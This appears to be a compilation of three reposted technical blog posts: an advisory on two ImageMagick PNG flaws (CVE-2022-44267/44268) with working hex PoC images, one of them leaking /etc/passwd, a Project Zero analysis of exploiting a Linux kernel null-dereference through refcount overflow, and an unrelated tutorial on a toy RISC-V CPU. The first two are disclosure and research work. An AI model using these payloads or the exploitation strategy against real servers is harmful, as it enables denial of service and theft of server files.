ImageMagick: The hidden vulnerability behind your online images

Original text by Metabase Q Team (Bryan Gonzalez, Ocelot Team)

Introduction

ImageMagick is a free and open-source software suite for displaying, converting, and editing image files. It can read and write over 200 image file formats and is therefore very commonly found on websites worldwide, since there is always a need to process pictures for user profiles, catalogs, and so on.

In a recent APT Simulation engagement, the Ocelot team identified that ImageMagick was used to process images in a Drupal-based website, so the team decided to look for new vulnerabilities in this component, downloading the latest version of ImageMagick, 7.1.0-49 at that time. As a result, two zero-days were identified:

  • CVE-2022-44267: ImageMagick 7.1.0-49 is vulnerable to Denial of Service. When it parses a PNG image (e.g., for resize), the convert process could be left waiting for stdin input.
  • CVE-2022-44268: ImageMagick 7.1.0-49 is vulnerable to Information Disclosure. When it parses a PNG image (e.g., for resize), the resulting image could have embedded the content of an arbitrary remote file (if the ImageMagick binary has permissions to read it).

How to trigger the exploitation?

To exploit the above-mentioned vulnerabilities remotely, an attacker needs to upload a malicious image to a website that processes images with ImageMagick.

The Ocelot team is very grateful to the ImageMagick volunteer team, who validated and released the needed patches in a timely manner:

https://github.com/ImageMagick/ImageMagick/commit/05673e63c919e61ffa1107804d1138c46547a475

In this blog, the technical details of the vulnerabilities are explained.

CVE-2022-44267: Denial of service

ImageMagick:  7.1.0-49

When ImageMagick parses a PNG file, for example in a resize operation when receiving an image, the convert process can be left waiting for stdin input, leading to a denial of service since the process will not be able to process other images.

A malicious actor could craft a PNG or use an existing one and add a textual chunk type (e.g., tEXt). These chunks have a keyword and a text string. If the keyword is the string “profile” (without quotes), ImageMagick will interpret the text string as a filename and will load its content as a raw profile. If the specified filename is “-” (a single dash), ImageMagick will try to read the content from standard input, potentially leaving the process waiting forever.
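
To make this concrete, here is a minimal Python sketch (not the original PoC generator) of how such a PNG could be assembled: a PNG is the 8-byte signature followed by chunks of the form length, type, data, CRC32(type + data), and the malicious tEXt chunk simply carries the keyword "profile", a NUL separator and the text "-". The actual PoC bytes are shown further below.

# Illustrative sketch only: build a 1x1 grayscale PNG and append a tEXt chunk
# whose keyword is "profile" and whose text is "-" (forcing a read from stdin).
import struct
import zlib

def chunk(ctype: bytes, data: bytes) -> bytes:
    # length + type + data + CRC32 over type and data
    return struct.pack(">I", len(data)) + ctype + data + \
        struct.pack(">I", zlib.crc32(ctype + data) & 0xFFFFFFFF)

png = b"\x89PNG\r\n\x1a\n"
png += chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))  # 1x1, 8-bit grayscale
png += chunk(b"IDAT", zlib.compress(b"\x00\x00"))                    # filter byte + one pixel
png += chunk(b"tEXt", b"profile\x00-")                               # keyword "profile", text "-"
png += chunk(b"IEND", b"")

with open("dos.png", "wb") as f:
    f.write(png)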

Exploitation Path Execution:

  • Upload image to trigger an ImageMagick command, like “convert”
  • ReadOnePNGImage (coders/png.c:2164): reading the “tEXt” chunk
  • SetImageProfile (MagickCore/property.c:4360): checking if the keyword equals “profile”, copying the text string as the filename in line 4720 and saving the content in line 4722
  • FileToStringInfo stores the content into string_info->datum (MagickCore/string.c:1005):
MagickExport StringInfo *FileToStringInfo(const char *filename,
  const size_t extent, ExceptionInfo *exception)
{
  StringInfo
    *string_info;

  assert(filename != (const char *) NULL);
  assert(exception != (ExceptionInfo *) NULL);
  if (IsEventLogging() != MagickFalse)
    (void) LogMagickEvent(TraceEvent, GetMagickModule(), "%s", filename);
  string_info=AcquireStringInfoContainer();
  string_info->path=ConstantString(filename);
  string_info->datum=(unsigned char *) FileToBlob(filename, extent,
    &string_info->length, exception);
  if (string_info->datum == (unsigned char *) NULL)
    {
      string_info=DestroyStringInfo(string_info);
      return((StringInfo *) NULL);
    }
  return(string_info);
}

FileToBlob (MagickCore/blob.c:1396): when the filename is “-”, the file descriptor is assigned to stdin, causing the process to wait for input forever:

  file=fileno(stdin);
  if (LocaleCompare(filename,"-") != 0)
    {
      status=GetPathAttributes(filename,&attributes);
      if ((status == MagickFalse) || (S_ISDIR(attributes.st_mode) != 0))
        {
          ThrowFileException(exception,BlobError,"UnableToReadBlob",filename);
          return(NULL);
        }
      file=open_utf8(filename,O_RDONLY | O_BINARY,0);
    }
  if (file == -1)
    {
      ThrowFileException(exception,BlobError,"UnableToOpenFile",filename);
      return(NULL);
    }
  offset=(MagickOffsetType) lseek(file,0,SEEK_END);
  count=0;
  if ((file == fileno(stdin)) || (offset < 0) ||
      (offset != (MagickOffsetType) ((ssize_t) offset)))
    {
      size_t
        quantum;

      struct stat
        file_stats;

      /*
        Stream is not seekable.
      */
      offset=(MagickOffsetType) lseek(file,0,SEEK_SET);
      quantum=(size_t) MagickMaxBufferExtent;
      if ((fstat(file,&file_stats) == 0) && (file_stats.st_size > 0))
        quantum=(size_t) MagickMin(file_stats.st_size,MagickMaxBufferExtent);
      blob=(unsigned char *) AcquireQuantumMemory(quantum,sizeof(*blob));
      for (i=0; blob != (unsigned char *) NULL; i+=count)
      {
        count=read(file,blob+i,quantum);

PoC: Malicious PNG File:

89504E470D0A1A0A0000000D49484452000000010000000108000000003A7E9B550000000B49444154789C63F8FF1F00030001FFFC25DC510000000A7445587470726F66696C65002D00600C56A10000000049454E44AE426082

Evidence: Malicious image file: OCELOT_output.png

Stdin input waiting forever:

CVE-2022-44268: Arbitrary Remote Leak

ImageMagick:  7.1.0-49

When ImageMagick parses the PNG file, for example in a resize operation, the resulting image can have the content of an arbitrary file from the website embedded in it (if the magick binary has permission to read it).

A malicious actor could craft a PNG or use an existing one and add a textual chunk type (e.g., tEXt). These chunks have a keyword and a text string. If the keyword is the string “profile” (without quotes), ImageMagick will interpret the text string as a filename and will load its content as a raw profile; the attacker can then download the resized image, which will contain the content of the remote file.

Exploitation Path Execution:

  • Upload image to trigger an ImageMagick command, like “convert”
  • ReadOnePNGImage (coders/png.c:2164): reading the “tEXt” chunk
  • SetImageProfile (MagickCore/property.c:4360): checking if the keyword equals “profile”, copying the text string as the filename in line 4720 and saving the content in line 4722
  • FileToStringInfo stores the content into string_info->datum (MagickCore/string.c:1005)

If a valid (and accessible) filename is provided, the content will be returned to the calling function (FileToStringInfo), and the StringInfo object will be returned to the SetImageProperty function, which saves the blob into the newly generated image via the SetImageProfile function:

This new image will be available for the attacker to download, with the arbitrary file content from the website embedded inside.

PoC: Malicious PNG content to leak “/etc/passwd” file:

89504E470D0A1A0A0000000D4948445200000001000000010100000000376EF9240000000A49444154789C636800000082008177CD72B6000000147445587470726F66696C65002F6574632F70617373776400B7F46D9C0000000049454E44AE426082
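
As a sanity check, the PoC bytes above can be parsed with a few lines of Python to confirm that the tEXt chunk really carries the keyword "profile" and the text "/etc/passwd". This decoder is only an illustration and not part of the original write-up.

# Walk the PNG chunks of the PoC above and print the tEXt keyword/text pair.
poc_hex = (
    "89504E470D0A1A0A0000000D4948445200000001000000010100000000376EF924"
    "0000000A49444154789C636800000082008177CD72B6000000147445587470726F"
    "66696C65002F6574632F70617373776400B7F46D9C0000000049454E44AE426082"
)
data = bytes.fromhex(poc_hex)
pos = 8  # skip the 8-byte PNG signature
while pos < len(data):
    length = int.from_bytes(data[pos:pos + 4], "big")
    ctype = data[pos + 4:pos + 8]
    body = data[pos + 8:pos + 8 + length]
    if ctype == b"tEXt":
        keyword, _, text = body.partition(b"\x00")
        print(keyword, text)  # b'profile' b'/etc/passwd\x00'
    pos += 12 + length  # 4 (length) + 4 (type) + data + 4 (CRC)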

Evidence:

Content of the /etc/passwd stored in the image via profile->datum variable:

Hexadecimal representation of the /etc/passwd content, extracted from the image:

Content from /etc/passwd in the website, received in the image generated:
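
The hexadecimal dump can be turned back into plaintext with a few lines of Python. This is an illustrative helper, assuming the hex was copied out of the resized image's metadata (for example from the "Raw profile type" block printed by identify -verbose); it is not part of the original write-up.

# Convert a whitespace-separated hex dump of the leaked raw profile back to text.
import sys

def decode_raw_profile(hex_text: str) -> bytes:
    return bytes.fromhex("".join(hex_text.split()))

if __name__ == "__main__":
    print(decode_raw_profile(sys.stdin.read()).decode(errors="replace"))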

Video showing the exploitation:

Exploiting null-dereferences in the Linux kernel

Original text by Seth Jenkins, Project Zero

For a fair amount of time, null-deref bugs were a highly exploitable kernel bug class. Back when the kernel was able to access userland memory without restriction, and userland programs were still able to map the zero page, there were many easy techniques for exploiting null-deref bugs. However with the introduction of modern exploit mitigations such as SMEP and SMAP, as well as mmap_min_addr preventing unprivileged programs from mmap’ing low addresses, null-deref bugs are generally not considered a security issue in modern kernel versions. This blog post provides an exploit technique demonstrating that treating these bugs as universally innocuous often leads to faulty evaluations of their relevance to security.

Kernel oops overview

At present, when the Linux kernel triggers a null-deref from within a process context, it generates an oops, which is distinct from a kernel panic. A panic occurs when the kernel determines that there is no safe way to continue execution, and that therefore all execution must cease. However, the kernel does not stop all execution during an oops — instead the kernel tries to recover as best as it can and continue execution. In the case of a task, that involves throwing out the existing kernel stack and going directly to make_task_dead which calls do_exit. The kernel will also publish in dmesg a “crash” log and kernel backtrace depicting what state the kernel was in when the oops occurred. This may seem like an odd choice to make when memory corruption has clearly occurred — however the intention is to allow kernel bugs to more easily be detectable and loggable under the philosophy that a working system is much easier to debug than a dead one.

The unfortunate side effect of the oops recovery path is that the kernel is not able to perform any associated cleanup that it would normally perform on a typical syscall error recovery path. This means that any locks that were locked at the moment of the oops stay locked, any refcounts remain taken, any memory otherwise temporarily allocated remains allocated, etc. However, the process that generated the oops, its associated kernel stack, task struct and derivative members etc. can and often will be freed, meaning that depending on the precise circumstances of the oops, it’s possible that no memory is actually leaked. This becomes particularly important in regards to exploitation later.

Reference count mismanagement overview

Refcount mismanagement is a fairly well-known and exploitable issue. In the case where software improperly decrements a refcount, this can lead to a classic UAF primitive. The case where software improperly doesn’t decrement a refcount (leaking a reference) is also often exploitable. If the attacker can cause a refcount to be repeatedly improperly incremented, it is possible that given enough effort the refcount may overflow, at which point the software no longer has any remotely sensible idea of how many refcounts are taken on an object. In such a case, it is possible for an attacker to destroy the object by incrementing and decrementing the refcount back to zero after overflowing, while still holding reachable references to the associated memory. 32-bit refcounts are particularly vulnerable to this sort of overflow. It is important however, that each increment of the refcount allocates little or no physical memory. Even a single byte allocation is quite expensive if it must be performed 2^32 times.
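
As a toy illustration of why the 32-bit counter is the weak point (pure Python arithmetic, not kernel code): after 2^32 leaked increments an overflow-unsafe counter wraps back to its starting value, so the very next get/put pair can drive it to zero and free the object while genuine references still exist.

MASK = 0xFFFFFFFF                          # an overflow-unsafe 32-bit counter wraps modulo 2**32

refcount = 1                               # the one legitimate, long-lived reference
leaked_increments = 2**32                  # one leaked reference per triggered bug
refcount = (refcount + leaked_increments) & MASK
assert refcount == 1                       # back where we started despite 2**32 extra references
# One further increment/decrement pair now reaches zero and frees the object
# prematurely, yielding a use-after-free on the still-referenced memory.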

Example null-deref bug

When a kernel oops unceremoniously ends a task, any refcounts that the task was holding remain held, even though all memory associated with the task may be freed when the task exits. Let’s look at an example — an otherwise unrelated bug I coincidentally discovered in the very recent past:

static int show_smaps_rollup(struct seq_file *m, void *v)
{
        struct proc_maps_private *priv = m->private;
        struct mem_size_stats mss;
        struct mm_struct *mm;
        struct vm_area_struct *vma;
        unsigned long last_vma_end = 0;
        int ret = 0;
        priv->task = get_proc_task(priv->inode); //task reference taken
        if (!priv->task)
                return -ESRCH;
        mm = priv->mm; //With no vma's, mm->mmap is NULL
        if (!mm || !mmget_not_zero(mm)) { //mm reference taken
                ret = -ESRCH;
                goto out_put_task;
        }
        memset(&mss, 0, sizeof(mss));
        ret = mmap_read_lock_killable(mm); //mmap read lock taken
        if (ret)
                goto out_put_mm;
        hold_task_mempolicy(priv);
        for (vma = priv->mm->mmap; vma; vma = vma->vm_next) {
                smap_gather_stats(vma, &mss);
                last_vma_end = vma->vm_end;
        }
        show_vma_header_prefix(m, priv->mm->mmap->vm_start,last_vma_end, 0, 0, 0, 0); //the deref of mmap causes a kernel oops here
        seq_pad(m, ' ');
        seq_puts(m, "[rollup]\n");
        __show_smap(m, &mss, true);
        release_task_mempolicy(priv);
        mmap_read_unlock(mm);
out_put_mm:
        mmput(mm);
out_put_task:
        put_task_struct(priv->task);
        priv->task = NULL;
        return ret;
}

This file is intended simply to print a set of memory usage statistics for the respective process. Regardless, this bug report reveals a classic and otherwise innocuous null-deref bug within this function. In the case of a task that has no VMA’s mapped at all, the task’s mm_struct mmap member will be equal to NULL. Thus the priv->mm->mmap->vm_start access causes a null dereference and consequently a kernel oops. This bug can be triggered by simply read’ing /proc/[pid]/smaps_rollup on a task with no VMA’s (which itself can be stably created via ptrace):

This kernel oops will mean that the following events occur:

  1. The associated struct file will have a refcount leaked if fdget took a refcount (we’ll try and make sure this doesn’t happen later)
  2. The associated seq_file within the struct file has a mutex that will forever be locked (any future reads/writes/lseeks etc. will hang forever).
  3. The task struct associated with the smaps_rollup file will have a refcount leaked
  4. The mm_struct’s mm_users refcount associated with the task will be leaked
  5. The mm_struct’s mmap lock will be permanently readlocked (any future write-lock attempts will hang forever)

Each of these conditions is an unintentional side-effect that leads to buggy behaviors, but not all of those behaviors are useful to an attacker. The permanent locking of conditions 2 and 5 only makes exploitation more difficult. Condition 1 is unexploitable because we cannot leak the struct file refcount again without taking a mutex that will never be unlocked. Condition 3 is unexploitable because a task struct uses a safe saturating kernel refcount_t which prevents the overflow condition. This leaves condition 4.


The mm_users refcount still uses an overflow-unsafe atomic_t and since we can take a readlock an indefinite number of times, the associated mmap_read_lock does not prevent us from incrementing the refcount again. There are a couple important roadblocks we need to avoid in order to repeatedly leak this refcount:

  1. We cannot call this syscall from the task with the empty vma list itself — in other words, we can’t call read from /proc/self/smaps_rollup. Such a process cannot easily make repeated syscalls since it has no virtual memory mapped. We avoid this by reading smaps_rollup from another process.
  2. We must re-open the smaps_rollup file every time because any future reads we perform on a smaps_rollup instance we already triggered the oops on will deadlock on the local seq_file mutex lock which is locked forever. We also need to destroy the resulting struct file (via close) after we generate the oops in order to prevent untenable memory usage.
  3. If we access the mm through the same pid every time, we will run into the task struct max refcount before we overflow the mm_users refcount. Thus we need to create two separate tasks that share the same mm and balance the oopses we generate across both tasks so the task refcounts grow half as quickly as the mm_users refcount. We do this via the clone flag CLONE_VM
  4. We must avoid opening/reading the smaps_rollup file from a task that has a shared file descriptor table, as otherwise a refcount will be leaked on the struct file itself. This isn’t difficult, just don’t read the file from a multi-threaded process.

Our final refcount leaking overflow strategy is as follows:

  1. Process A forks a process B
  2. Process B issues PTRACE_TRACEME so that when it segfaults upon return from munmap it won’t go away (but rather will enter tracing stop)
  3. Process B clones another process C with CLONE_VM | CLONE_PTRACE
  4. Process B munmap’s its entire virtual memory address space — this also unmaps process C’s virtual memory address space.
  5. Process A forks new children D and E which will access (B|C)’s smaps_rollup file respectively
  6. (D|E) opens (B|C)’s smaps_rollup file and performs a read which will oops, causing (D|E) to die. mm_users will be refcount leaked/incremented once per oops
  7. Process A goes back to step 5 ~2^32 times

The above strategy can be rearchitected to run in parallel (across processes, not threads, because of roadblock 4) to improve performance. On server setups that print kernel logging to a serial console, generating 2^32 kernel oopses takes over 2 years. However, on a vanilla Kali Linux box using a graphical interface, a demonstrative proof-of-concept takes only about 8 days to complete! At the completion of execution, the mm_users refcount will have overflowed and been set to zero, even though this mm is currently in use by multiple processes and can still be referenced via the proc filesystem.
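
For a sense of scale, the oops rate implied by those figures can be back-computed with trivial arithmetic (the rate itself is my estimate, not a number from the original post):

oopses = 2**32
days = 8                                # reported duration of the proof-of-concept run
rate = oopses / (days * 24 * 3600)
print(f"{rate:.0f} oopses per second")  # roughly 6200 oopses per second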

Exploitation

Once the mm_users refcount has been set to zero, triggering undefined behavior and memory corruption should be fairly easy. By triggering an mmget and an mmput (which we can very easily do by opening the smaps_rollup file once more) we should be able to free the entire mm and cause a UAF condition:

static inline void __mmput(struct mm_struct *mm)
{
        VM_BUG_ON(atomic_read(&mm->mm_users));
        uprobe_clear_state(mm);
        exit_aio(mm);
        ksm_exit(mm);
        khugepaged_exit(mm);
        exit_mmap(mm);
        mm_put_huge_zero_page(mm);
        set_mm_exe_file(mm, NULL);
        if (!list_empty(&mm->mmlist)) {
                spin_lock(&mmlist_lock);
                list_del(&mm->mmlist);
                spin_unlock(&mmlist_lock);
        }
        if (mm->binfmt)
                module_put(mm->binfmt->module);
        lru_gen_del_mm(mm);
        mmdrop(mm);
}

Unfortunately, since 64591e8605 (“mm: protect free_pgtables with mmap_lock write lock in exit_mmap”), exit_mmap unconditionally takes the mmap lock in write mode. Since this mm’s mmap_lock is permanently readlocked many times, any calls to __mmput will manifest as a permanent deadlock inside of exit_mmap.

However, before the call permanently deadlocks, it will call several other functions:

  1. uprobe_clear_state
  2. exit_aio
  3. ksm_exit
  4. khugepaged_exit

Additionally, we can call __mmput on this mm from several tasks simultaneously by having each of them trigger an mmget/mmput on the mm, generating irregular race conditions. Under normal execution, it should not be possible to trigger multiple __mmput’s on the same mm (much less concurrent ones) as __mmput should only be called on the last and only refcount decrement which sets the refcount to zero. However, after the refcount overflow, all mmget/mmput’s on the still-referenced mm will trigger an __mmput. This is because each mmput that decrements the refcount to zero (despite the corresponding mmget being why the refcount was above zero in the first place) believes that it is solely responsible for freeing the associated mm.

This racy __mmput primitive extends to its callees as well. exit_aio is a good candidate for taking advantage of this:

void exit_aio(struct mm_struct *mm)
{
        struct kioctx_table *table = rcu_dereference_raw(mm->ioctx_table);
        struct ctx_rq_wait wait;
        int i, skipped;
        if (!table)
                return;
        atomic_set(&wait.count, table->nr);
        init_completion(&wait.comp);
        skipped = 0;
        for (i = 0; i < table->nr; ++i) {
                struct kioctx *ctx =
                rcu_dereference_protected(table->table[i], true);
                if (!ctx) {
                        skipped++;
                        continue;
                }
                ctx->mmap_size = 0;
                kill_ioctx(mm, ctx, &wait);
        }
        if (!atomic_sub_and_test(skipped, &wait.count)) {
                /* Wait until all IO for the context are done. */
                wait_for_completion(&wait.comp);
        }
        RCU_INIT_POINTER(mm->ioctx_table, NULL);
        kfree(table);
}

While the callee function kill_ioctx is written in such a way to prevent concurrent execution from causing memory corruption (part of the contract of aio allows for kill_ioctx to be called in a concurrent way), exit_aio itself makes no such guarantees. Two concurrent calls of exit_aio on the same mm struct can consequently induce a double free of the mm->ioctx_table object, which is fetched at the beginning of the function, while only being freed at the very end. This race window can be widened substantially by creating many aio contexts in order to slow down exit_aio’s internal context freeing loop. Successful exploitation will trigger the following kernel BUG indicating that a double free has occurred:

Note that as this exit_aio path is hit from __mmput, triggering this race will produce at least two permanently deadlocked processes when those processes later try to take the mmap write lock. However, from an exploitation perspective, this is irrelevant as the memory corruption primitive has already occurred before the deadlock occurs. Exploiting the resultant primitive would probably involve racing a reclaiming allocation in between the two frees of the mm->ioctx_table object, then taking advantage of the resulting UAF condition of the reclaimed allocation. It is undoubtedly possible, although I didn’t take this all the way to a completed PoC.

Conclusion

While the null-dereference bug itself was fixed in October 2022, the more important fix was the introduction of an oops limit which causes the kernel to panic if too many oopses occur. While this patch is already upstream, it is important that distributed kernels also inherit this oops limit and backport it to LTS releases if we want to avoid treating such null-dereference bugs as full-fledged security issues in the future. Even in that best-case scenario, it is nevertheless highly beneficial for security researchers to carefully evaluate the side-effects of bugs discovered in the future that are similarly “harmless” and ensure that the abrupt halt of kernel code execution caused by a kernel oops does not lead to other security-relevant primitives.

How a CPU works: Bare metal C on my RISC-V toy CPU

Original text from Florian Noeding’s blog

I always wanted to understand how a CPU works, how it transitions from one instruction to the next and makes a computer work. So after reading Ken Shirriff’s blog about a bug fix in the 8086 processor I thought: Well, let’s try to write one in a hardware description language. This post is a write-up of my learning experiment.

I’ll walk through my steps of creating an emulator, compiling and linking C for bare metal, CPU design and finally the implementation of my toy RISC-V CPU.

Goals 

  • implement a CPU in a hardware description language (HDL),
  • code must be synthesizable (except memory),
  • simulate it,
  • and run a bare metal C program on it.

While I had plenty of research time, I had only about 30 hours of development time. Without prior hardware design experience, the goals had to be simple enough:

  • RISC V Integer instruction set only (minus system and break calls),
  • no interrupt handling or other complexities,
  • no or only minimal optimizations.

My test program written in C is Conway’s game of life, try the interactive web version.

In a future iteration I plan to run my project on a real FPGA and implement a memory controller. Let’s say I made it to about 85% of what I wanted to achieve.

Write an emulator 

Writing an emulator, i.e. a program that can execute the instructions of a CPU, is an excellent stepping stone towards a hardware implementation. For me — without a hardware background — it is much easier to reason about and learn the instruction set.

So my first step was to understand the RISC V instruction set. The RISC V specification is quite long, but I only needed chapters 2 (integer instruction set), 19 (RV32 / 64G instruction set listings) and 20 (assembly programmer’s handbook). These give detailed definitions of how each instruction must be executed, what kind of registers must be implemented, etc.

Let’s look at an example: arithmetic / logical instructions operating on a register and an immediate value. For ADDI (add immediate) the following is done: rd <- rs1 + imm. The register identified by rd is set to the sum of the value stored in register rs1 and the immediate value given in the instruction itself.
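
As a small worked example of the I-type encoding (my own sanity check following the bit layout in the spec: imm[11:0], rs1, funct3, rd, opcode), addi x1, x0, 42 assembles to 0x02A00093, which is exactly the first word of the test ROM used further below.

def encode_addi(rd: int, rs1: int, imm: int) -> int:
    # I-type: imm[11:0] | rs1 | funct3=000 | rd | opcode=0010011 (OP-IMM)
    return ((imm & 0xFFF) << 20) | (rs1 << 15) | (0b000 << 12) | (rd << 7) | 0b0010011

assert encode_addi(rd=1, rs1=0, imm=42) == 0x02A00093  # addi x1, x0, 42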

The emulator is implemented in C++ with a C-style interface in a shared library. This makes it easy to hook it into Python via cffi. This saved me quite a bit of time for file system and user interactions, which were all done in Python.

struct RV32EmuState;

extern "C" RV32EmuState* rv32emu_init();
extern "C" void rv32emu_free(RV32EmuState *state);

extern "C" void rv32emu_set_rom(RV32EmuState *state, void *data, uint32_t size);
extern "C" void rv32emu_read(RV32EmuState *state, uint32_t addr, uint32_t size, void *p);

extern "C" int32_t rv32emu_step(RV32EmuState *state);
extern "C" int32_t rv32emu_run(RV32EmuState *state, uint32_t *breakpoints, uint32_t num_breakpoints);

extern "C" void rv32emu_print(RV32EmuState *state);

The core of the emulator is the rv32emu_step function, which executes exactly one instruction and then returns. In RISC V each instruction is exactly 32 bits. It first decodes the opcode (what kind of operation) and then the specific operation (e.g. ADD immediate). It’s a large, nested switch.

int32_t rv32emu_step(RV32EmuState *state) {
    uint32_t *instr_p = (uint32_t*)(_get_pointer(state, state->pc));
    uint32_t instr = *instr_p;

    // decode
    uint32_t opcode = instr & 0x7F; // instr[6..0]

    switch(opcode) {
        //
        // ... all opcode types ...
        //
        case OPCODE_OP_IMM: {
            uint32_t funct3 = (instr >> 12) & 0x07; // instr[14..12]
            uint32_t rs1 = ((instr >> 15) & 0x1F);

            uint32_t imm = (instr >> 20) & 0x0FFF; // 12 bits
            uint32_t imm_sign = instr & (1ul << 31);
            if(imm_sign) {
                imm |= 0xFFFFF000;
            }

            uint32_t data1 = state->reg[rs1];
            uint32_t data2 = imm;
            uint32_t reg_dest = (instr >> 7) & 0x1F;
            if(reg_dest != 0) { // register 0 is always zero and never written to
                switch(funct3) {
                    //
                    // ... all OP_IMM instructions ...
                    //
                    case FUNCT3_OP_ADD: {
                        state->reg[reg_dest] = data1 + data2;
                        break;
                    }
                }
            }
            break;
        }

    // ...
    }

    state->pc += 4; // go to next instruction for non-jump / non-branch
    return 0;
}

The mathematical and logical operations are the simplest to implement, so I started with them. Iteratively I’ve added branches, jumps and the remaining logic until I had covered all instructions other than ECALL and EBREAK. These two were not necessary for my bare metal experiment.

For testing I relied on simple hand-written assembly code. Of course this did not exercise my emulator thoroughly. So as a next step I wanted to finally run my Conway’s game of life simulation.

Cross compiling, linking and ELF to bin 

Going from C to a bare metal CPU takes a few steps: cross compile, ensure proper memory layout and convert the ELF file to a binary blob. Also, instead of having a main function, my code has a _start function defined as follows:

void __attribute__((section (".text.boot"))) _start() {
    run(); // call the actual "entrypoint"
}

I’ll explain the details later.

My CPU only supports the RISC-V 32 bit integer instruction set, but my host system is running on x86-64. So I needed a cross compiler and used the Ubuntu package gcc-riscv64-unknown-elf. Then I could compile my code using the following command:

riscv64-unknown-elf-gcc -march=rv32i -mabi=ilp32 \
    -nostdlib -ffreestanding -Tprograms/memory_map.ld \
    -o life.rv32.elf life.c

Let’s take this apart:

  1. execute the RISC-V cross-compiler
  2. set its architecture to rv32i, which is the RISC-V 32bit integer instruction set
  3. define the application binary interface, i.e. conventions how to emit assembly. This makes it so that integers, longs and pointers are 32 bit
    • these three are needed to emit code compatible with my emulator and later CPU
  4. compile without a standard library
    • Standard libraries like the system libc assume operating system support, but my toy CPU will be running bare metal. So we have to switch that off. This means we won’t have access to malloc, printf, puts, etc. Instead we’ll need to implement this ourselves, if we want to use it. This means we have no startup code either.
  5. compile freestanding, that is, do not assume the presence of an operating system or library, and switch off libc-specific optimizations and defaults
    • for example we won’t have a main function, which is otherwise required
  6. use a memory map
    • we need to tell the compiler and linker where instructions and global variables will be placed in memory. We do not have a loader to do this at application startup

Even though we do not yet have any hardware, we must make a few decisions for item 6: what should our address space look like?

  • program execution starts at 0x1000, which below I’ll call rom for read-only-memory
  • memory for globals, stack variables and heap will be located at 0x10000000

These values are kind of arbitrary. I wanted to avoid having code at address zero to avoid issues with NULL pointers. The linker script also ensures that our program entry point, the function _start, is placed at 0x1000, so that the emulator will execute that code first. Here’s my linker script for my address space setup:

ENTRY(_start)

MEMORY
{
    rom (rx ): ORIGIN = 0x00001000, LENGTH = 16M
    ram (rw): ORIGIN = 0x10000000, LENGTH = 32M
}

SECTIONS
{
    .text : {
        /*
            entry point is expected to be the first function here
            --> we are assuming there's only a single function in the .text.boot segment and by convention that is "_start"

            KEEP ensures that "_start" is kept here, even if there are no references to it
        */
        KEEP(*(.text.boot))

        /*
            all other code follows
        */
        *(.text*)
    } > rom

    .rodata : { *(.rodata*) } > rom

    .bss : { *(.bss*) } > ram
}

After compilation we can check that _start is actually at 0x1000:

riscv64-unknown-elf-readelf -s life.rv32.elf | grep '_start$'

Now the “problem” is that gcc generates an ELF and not just a stream of instructions. The Executable and Linkable Format is, simplified, a container to store executable code, data and metadata in a way that makes it easy to later load into memory, as specified by a memory map like the one above. Since my program is fairly simple it does not need memory initialization. So we can simply dump the RISC-V instructions from the .text segment into a binary file.

riscv64-unknown-elf-objcopy -O binary life.rv32.elf life.rv32.bin

So now the C snippet from above should make more sense:

void __attribute__((section (".text.boot"))) _start() {
    run();
}

We are defining a function _start which should go into the segment .text.boot. The linker script instructs the toolchain to make sure this code is placed at 0x1000, even when no other code references it. By having exactly one function in .text.boot this is guaranteed to happen.

Turns out this is still not enough to make the code work. The startup code above does not initialize the stack pointer, i.e. where local variables live in memory. I decided to simplify things and hard-code the initial stack pointer value in my emulator and CPU. This means simply setting register x2, also known as sp, to the end of the memory, here 0x12000000.
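
That value is simply the end of the ram region from the linker script above (origin 0x10000000 plus 32M), as a quick check shows:

# end of the "ram" region from the linker script: ORIGIN 0x10000000 + LENGTH 32M
assert 0x10000000 + 32 * 1024 * 1024 == 0x12000000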

A couple of other registers defined in the ABI with special purposes are not used by my program, so I did not implement support for them: the global pointer gp and the thread pointer tp.

No standard library 

When the program is running on my host I rely on the standard library for memory allocation like malloc, or putchar for output. But when running bare metal these functions are not available.

I’ve replaced dynamic memory allocation with static memory assignments. Since my program is the only one running on the CPU, I can use all resources how I see fit. The flag FREESTANDING is set when the program is compiled for my RISC-V emulator / CPU. Without it, the program can run as-is on my host system like any other program.

void run() {
    #ifdef FREESTANDING
        map0 = (unsigned char*)0x10080000;                              // gamestate
        map1 = map0 + 0x80000;                                          // new gamestate
        leds = map1 + 0x80000;                                          // output for emulator
    #else
        map0 = (unsigned char*)malloc((WIDTH + 2) * (HEIGHT + 2));
        map1 = (unsigned char*)malloc((WIDTH + 2) * (HEIGHT + 2));
    #endif

    // ...
}

Instead of relying on putchar for output to the console, my program assumes that the address of the variable leds is memory-mapped to an external LED array. In case of the emulator, it will simply read this memory area and display it on the console. When running in the simulator (or on an FPGA in the next iteration), the memory controller will set output pins accordingly.
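
As an illustration of that emulator-side display, the Python host could read the leds region through the cffi bindings and render it as text. This is a sketch under assumptions: the shared library name, the LED panel dimensions and the rendering are mine; only the rv32emu_* interface and the address layout come from the code above.

from cffi import FFI

ffi = FFI()
ffi.cdef("""
    typedef struct RV32EmuState RV32EmuState;
    RV32EmuState* rv32emu_init(void);
    void rv32emu_read(RV32EmuState *state, uint32_t addr, uint32_t size, void *p);
""")
lib = ffi.dlopen("./librv32emu.so")          # assumed library name

LEDS_ADDR = 0x10080000 + 2 * 0x80000         # leds = map1 + 0x80000 (see run() above)

def show_leds(state, width=64, height=32):   # panel size is an assumption
    buf = ffi.new("unsigned char[]", width * height)
    lib.rv32emu_read(state, LEDS_ADDR, width * height, buf)
    data = bytes(ffi.buffer(buf))
    for y in range(height):
        row = data[y * width:(y + 1) * width]
        print("".join("#" if cell else "." for cell in row))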

Emulator in action 

Here’s the result of all of that work: First setting a breakpoint for each game of life cycle, and then manually stepping through the program on the emulated CPU.

Best viewed in full-screen mode due to web-unfriendly layout.

CPU overview 

With the emulator completed I now have a working reference system to debug my CPU. And so I started implementing it.

A simple CPU consists of the following components:

  • Arithmetic Logic Unit (ALU): the compute part, for operations like “add” or “xor”
  • Register File: provides and stores register values
  • Decoder: transform instruction to a set of control signals, controlling the CPU operation
  • Program Counter: manages the address where the next instruction is found
  • Load Store Unit (LSU): connects the CPU to its memory
  • Control Unit: tying all the parts together to form a CPU

These are the basic elements of a CPU and sufficient for my toy RISC-V implementation.

Describing hardware in code 

